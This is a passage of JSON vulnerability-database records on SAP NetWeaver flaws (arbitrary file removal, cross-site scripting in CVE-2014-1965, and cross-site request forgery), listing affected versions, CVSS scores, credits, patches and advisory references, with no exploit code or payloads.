ADVISORY:\nhttp://secunia.com/advisories/45715/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/45715/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45715\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nAlexey Sintsov has reported a vulnerability in SAP NetWeaver, which\ncan be exploited by malicious users to manipulate certain data. \nTMSADM or SAPCPIC. \n\nSOLUTION:\nApply fixes. Please see the vendor\u0027s advisory for details. \n\nPROVIDED AND/OR DISCOVERED BY:\nAlexey Sintsov, Digital Security Research Group (DSecRG). \n\nORIGINAL ADVISORY:\nSAP:\nhttps://service.sap.com/sap/support/notes/1554030\n\nDigital Security Research Group:\nhttp://dsecrg.com/pages/vul/show.php?id=331\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3380"
},
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "PACKETSTORM",
"id": "104507"
}
],
"trust": 0.81
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2011-3380",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "45715",
"trust": 0.7
},
{
"db": "IVD",
"id": "C4AD916A-1F8A-11E6-ABEF-000C29C66E3D",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "104507",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3380"
},
{
"db": "PACKETSTORM",
"id": "104507"
}
]
},
"id": "VAR-201108-0303",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3380"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3380"
}
]
},
"last_update_date": "2022-05-17T22:46:29.008000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver \u0027EPS_DELETE_FILE\u0027 patch for arbitrary file removal vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/4907"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3380"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://secunia.com/advisories/45715/http"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/blog/242"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45715/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/45715/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1554030"
},
{
"trust": 0.1,
"url": "http://dsecrg.com/pages/vul/show.php?id=331"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=45715"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3380"
},
{
"db": "PACKETSTORM",
"id": "104507"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-3380"
},
{
"db": "PACKETSTORM",
"id": "104507"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-29T00:00:00",
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
},
{
"date": "2011-08-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-3380"
},
{
"date": "2011-08-27T06:04:08",
"db": "PACKETSTORM",
"id": "104507"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2011-08-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2011-3380"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u0027EPS_DELETE_FILE\u0027 Arbitrary File Removal Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-3380"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Permission permission and access control",
"sources": [
{
"db": "IVD",
"id": "c4ad916a-1f8a-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201402-0241
Vulnerability from variot
Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. Portal handles the vulnerability of WebDyn Pro and can leak path information. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. The relevant DIR error input lacks filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. 4. Some of the relevant ISpeakAdapter inputs lack filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. A remote attacker can exploit a vulnerability to get sensitive information or crash an application. SAP NetWeaver is prone to multiple security vulnerabilities, including: 1. An information-disclosure vulnerability 2. Multiple cross-site scripting vulnerabilities 3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201402-0241",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "3.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "for sap exchange infrastructure (bc-xi) 3.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "for sap exchange infrastructure (bc-xi) 7.00 to 7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "for sap exchange infrastructure (bc-xi) 7.10 to 7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1965"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexander Polyakov, George Nosenko and Dmitry Chastukhin",
"sources": [
{
"db": "BID",
"id": "65547"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1965",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-1965",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-01007",
"impactScore": 4.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2014-1965",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201402-208",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in ISpeakAdapter in the Integration Repository in the SAP Exchange Infrastructure (BC-XI) component 3.0, 7.00 through 7.02, and 7.10 through 7.11 for SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via vectors related to PIP. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. There are several vulnerabilities in SAP NetWeaver: 1. Portal handles the vulnerability of WebDyn Pro and can leak path information. 2, the message server has an unspecified error, allowing the attacker to exploit the vulnerability to crash the server. 3. The relevant DIR error input lacks filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. 4. Some of the relevant ISpeakAdapter inputs lack filtering before returning to the user, allowing remote attackers to exploit the vulnerability for cross-site scripting attacks to obtain sensitive information or hijack user sessions. A remote attacker can exploit a vulnerability to get sensitive information or crash an application. SAP NetWeaver is prone to multiple security vulnerabilities, including:\n1. An information-disclosure vulnerability\n2. Multiple cross-site scripting vulnerabilities\n3. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1965",
"trust": 3.0
},
{
"db": "SECUNIA",
"id": "56947",
"trust": 1.6
},
{
"db": "BID",
"id": "65547",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2014-01007",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201402-208",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"id": "VAR-201402-0241",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
],
"trust": 0.87111164
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
}
]
},
"last_update_date": "2023-12-18T13:39:58.037000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.sap.com/index.html"
},
{
"title": "SAP NetWeaver has multiple vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/43676"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "NVD",
"id": "CVE-2014-1965"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://erpscan.com/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/56947"
},
{
"trust": 1.6,
"url": "http://www.stechno.net/sap-notes.html?view=sapnote\u0026id=1442517"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1442517"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-14-006-sap-netweaver-pip-xss/"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/91094"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-1965"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-1965"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-001-sap-netweaver-message-server-dos/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-002-sap-portal-webdynpro-path-disclosure/"
},
{
"trust": 0.6,
"url": "http://erpscan.com/advisories/erpscan-14-005-sap-netweaver-dir-error-xss/"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"db": "BID",
"id": "65547"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"date": "2014-02-14T15:55:07.830000",
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-01007"
},
{
"date": "2014-02-01T00:00:00",
"db": "BID",
"id": "65547"
},
{
"date": "2014-02-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001415"
},
{
"date": "2018-12-10T19:29:04.140000",
"db": "NVD",
"id": "CVE-2014-1965"
},
{
"date": "2014-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver for SAP Exchange Infrastructure Component cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001415"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201402-208"
}
],
"trust": 0.6
}
}
var-201211-0614
Vulnerability from variot
SAP NetWeaver is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201211-0614",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "57653"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexey Tyurin, ERPScan",
"sources": [
{
"db": "BID",
"id": "57653"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.\nExploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.",
"sources": [
{
"db": "BID",
"id": "57653"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57653",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "57653"
}
]
},
"id": "VAR-201211-0614",
"iot": {
